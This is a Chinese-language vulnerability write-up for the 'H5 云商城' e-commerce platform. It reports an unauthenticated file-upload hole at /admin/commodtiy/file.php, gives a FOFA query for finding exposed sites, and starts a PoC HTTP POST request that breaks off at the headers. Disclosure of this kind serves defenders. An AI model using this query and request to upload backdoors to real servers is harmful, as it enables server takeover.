0x01 产品简介

H5 云商城是一个基于 H5 技术的电子商务平台，旨在为用户提供方便快捷的在线购物体验。多平台适配：H5 云商城采用 H5 技术开发，具有良好的跨平台适配性。无论是在电脑、手机还是平板等设备上，用户都可以通过网页浏览器访问和使用云商城，无需安装额外的应用程序。

0x02 漏洞概述

由于H5 云商城 /admin/commodtiy/ 接口商品图片上传处，没有对用户传入的文件进行校验和过滤判断，导致未经身份验证的远程攻击者可直接上传恶意后门文件，执行恶意代码，获取服务器权限。

0x03 复现环境

FOFA：body="/public/qbsp.php"

0x04 漏洞复现

PoC

POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb